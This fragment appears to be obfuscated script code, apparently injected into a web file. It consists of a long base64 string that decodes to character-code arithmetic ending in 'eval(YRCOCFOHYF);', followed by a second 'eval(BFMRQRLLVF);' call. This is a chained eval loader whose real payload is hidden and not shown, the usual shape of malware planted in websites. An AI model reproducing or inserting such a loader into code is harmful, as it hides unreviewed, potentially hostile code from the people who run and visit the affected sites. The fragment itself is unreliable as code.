MyAtIDgsIDEwOCAtIDcsIDExOSAtIDksIDEwMSAtIDIsIDQ4IC0gOCwgMTI0IC0gOSwgMTE4IC0gMiwgMTE3IC0gMywgMTEzIC0gOCwgMTE5IC0gOSwgMTExIC0gOCwgNTAgLSA2LCAzMyAtIDEsIDEwOCAtIDEsIDEwOSAtIDgsIDEyNSAtIDQsIDQ0IC0gMywgNDEgLSA5LCAxMjYgLSAzLCAxMSAtIDEsIDM2IC0gNCwgMzkgLSA3LCAxMjYgLSA4LCA5OSAtIDIsIDExNSAtIDEsIDM1IC0gMywgMTIwIC0gNiwgMTAyIC0gMSwgMTIxIC0gNiwgNDAgLSA4LCA2OCAtIDcsIDMzIC0gMSwgNDIgLSAzLCA0NiAtIDcsIDY3IC0gOCwgMTEgLSAxLCAzMyAtIDEsIDM5IC0gNywgMTExIC0gOSwgMTE5IC0gOCwgMTIwIC0gNiwgMzggLSA2LCA0OSAtIDksIDEyNiAtIDgsIDk5IC0gMiwgMTIzIC0gOSwgNDAgLSA4LCAxMTQgLSA5LCAzNSAtIDMsIDcwIC0gOSwgMzggLSA2LCA1MiAtIDQsIDYzIC0gNCwgMzYgLSA0LCAxMDggLSAzLCAzNSAtIDMsIDY1IC0gNSwgMzQgLSAyLCAxMjEgLSA2LCAxMTcgLSAxLCAxMTYgLSAyLCAxMTIgLSA3LCAxMTcgLSA3LCAxMDUgLSAyLCA1MCAtIDQsIDExNiAtIDgsIDEwOCAtIDcsIDExMiAtIDIsIDExMCAtIDcsIDExNyAtIDEsIDEwNyAtIDMsIDY4IC0gOSwgMzkgLSA3LCAxMDYgLSAxLCA1MCAtIDcsIDQ0IC0gMSwgNDkgLSA4LCAzOCAtIDYsIDEyOSAtIDYsIDE1IC0gNSwgNDAgLSA4LCAzNCAtIDIsIDM2IC0gNCwgMzQgLSAyLCAxMTkgLSA1LCAxMDQgLSAzLCAxMjEgLSA2LCAzNyAtIDUsIDUxIC0gOCwgNjkgLSA4LCAzOSAtIDcsIDg4IC0gNSwgMTIwIC0gNCwgMTE3IC0gMywgMTA3IC0gMiwgMTE3IC0gNywgMTA0IC0gMSwgNTQgLSA4LCAxMDQgLSAyLCAxMTkgLSA1LCAxMTcgLSA2LCAxMTAgLSAxLCA3MiAtIDUsIDEwOCAtIDQsIDEwNiAtIDksIDExNyAtIDMsIDc1IC0gOCwgMTE4IC0gNywgMTA3IC0gNywgMTA0IC0gMywgNDggLSA4LCAxMTggLSAzLCAxMjAgLSA0LCAxMjEgLSA3LCAxMTMgLSA4LCAxMTUgLSA1LCAxMTEgLSA4LCA0NyAtIDEsIDEwNiAtIDcsIDEwOSAtIDUsIDEwMiAtIDUsIDExOCAtIDQsIDc1IC0gOCwgMTE1IC0gNCwgMTA0IC0gNCwgMTAyIC0gMSwgNzQgLSA5LCAxMjQgLSA4LCA0OSAtIDksIDEwNyAtIDIsIDUwIC0gOSwgMzggLSA2LCAxMDEgLSA3LCAxOSAtIDksIDE2IC0gNywgMTIgLSAzLCAxOCAtIDksIDE4IC0gOSwgMTE0IC0gNywgMTA1IC0gNCwgMTMwIC0gOSwgNTEgLSA1LCAxMDUgLSA2LCAxMDcgLSAzLCAxMDAgLSAzLCAxMTkgLSA1LCA3MiAtIDUsIDExNSAtIDQsIDEwMyAtIDMsIDEwOCAtIDcsIDc0IC0gOSwgMTIwIC0gNCwgNDIgLSAyLCAxMDYgLSAxLCAzMyAtIDEsIDM5IC0gMiwgMzYgLSA0LCAxMTIgLSA1LCAxMDcgLSA2LCAxMjcgLSA2LCA1MyAtIDcsIDExNiAtIDgsIDEwOSAtIDgsIDExNSAtIDUsIDEwOSAtIDYsIDEyMyAtIDcsIDEwOSAtIDUsIDQ4IC0gNywgNDcgLSA2LCA2MiAtIDMsIDExIC0gMSwgMzggLSA2LCAzOCAtIDYsIDEzMiAtIDcsIDE1IC0gNSwgMzggLSA2LCAzOCAtIDYsIDEyMiAtIDgsIDEwOSAtIDgsIDEyMiAtIDYsIDEyNSAtIDgsIDExNyAtIDMsIDExMiAtIDIsIDM5IC0gNywgMTE1IC0gMSwgMTA4IC0gNywgMTIxIC0gNiwgNjIgLSAzLCAxNSAtIDUsIDEzMCAtIDUsIDE4IC0gOCwgMTUgLSA1LCAxMjYgLSA4LCAxMDQgLSA3LCAxMjMgLSA5LCAzOSAtIDcsIDEwNyAtIDcsIDEwMyAtIDIsIDEwMyAtIDQsIDM2IC0gNCwgNjQgLSAzLCAzOSAtIDcsIDEyMyAtIDMsIDExNSAtIDQsIDExOSAtIDUsIDk4IC0gMywgMTEwIC0gOSwgMTE1IC0gNSwgMTAzIC0gNCwgNDMgLSAzLCAxMDQgLSA3LCAxMjQgLSA4LCAxMTYgLSA1LCAxMDQgLSA2LCA0MSAtIDEsIDEwMiAtIDEsIDExNiAtIDYsIDEwNCAtIDUsIDEwOCAtIDcsIDEwMiAtIDIsIDQyIC0gMSwgNDYgLSAyLCAzOSAtIDcsIDExNSAtIDgsIDEwOSAtIDgsIDEyMiAtIDEsIDQ1IC0gNCwgNjUgLSA2LCAxNSAtIDUsIDQ4IC0gOCwgMTEzIC0gMywgMTA2IC0gNSwgMTIyIC0gMywgMzggLSA2LCA3NiAtIDYsIDEyNSAtIDgsIDExNiAtIDYsIDEwMyAtIDQsIDEyNCAtIDgsIDExMSAtIDYsIDExNCAtIDMsIDExNiAtIDYsIDQ3IC0gNywgMTA4IC0gOCwgMTEwIC0gOSwgMTA1IC0gNiwgNDMgLSAyLCA0NCAtIDMsIDQ0IC0gNCwgNDIgLSAxLCA2NyAtIDgsIDEzIC0gMywgMTggLSA4KTtldmFsKFlSQ09DRk9IWUYpOw==’);
eval(BFMRQRLLVF);